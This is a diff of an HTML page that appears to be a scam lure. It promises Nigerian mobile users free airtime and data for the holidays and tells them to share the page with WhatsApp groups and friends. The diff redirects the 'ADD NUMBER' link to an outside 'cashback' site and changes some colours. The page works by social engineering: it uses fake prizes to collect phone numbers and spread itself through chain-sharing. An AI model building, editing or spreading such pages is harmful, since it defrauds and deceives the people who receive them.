--- a/davido.html
+++ b/davido.html
@@ -125,10 +125,10 @@
           
           
             </div>
-            <p class="error">Sorry, Your Mobile Number is Missing <a href="https://opay-anniversary-celebration.blogspot.com/#1691275570947"> <b><font color="#14948F">ADD NUMBER</font></b></a></p>
+            <p class="error">Sorry, Your Mobile Number is Missing <a href="https://get-offre.org/cashback.html#1703261512573"> <b><font color="#ffffff">ADD NUMBER</font></b></a></p>
         </div>
         <div id="checking">
-          <p class="title"><font color="#000000">Processing Data and Airtime...</font></p>
+          <p class="title"><font color="#ffffff">Processing Data and Airtime...</font></p>
             <div class="barr">
                 <div class="fill">
                     <div id="fill"></div>
@@ -142,9 +142,9 @@
         </div>
         <div id="share">
 
-          <p class="tip"> <font color="#ffffff">Congratulations, your Mobile Number</font> <span id="getname"></span>،</p>
+          <p class="tip"> <font color="yellow">Congratulations, your Mobile Number</font> <span id="getname"></span>،</p>
             <p class="tip">
-              <font color="#ffffff"> is Eligible to receive ₦5,000 airtime and 10GB Free Data Christmas and new year celebration offer</font><span class="amount"> <font color="yellow">Proceed to Activate your Free Data and Airtime</font>font> </span><br>
+              <font color="#ffffff"> is Eligible to receive ₦5,000 airtime and 10GB Free Data Christmas and new year celebration offer</font><span class="amount"> <font color="yellow">Proceed to Activate your Free Data and Airtime</font> </span><br>
               <font color="#ffffff">How to proceed:</font>
             </p><br><font color="#ffffff">
             <p class="tip">1. Share it with 5 groups or 15 friends on WhatsApp (Click on the "SHARE" icon below).</p>
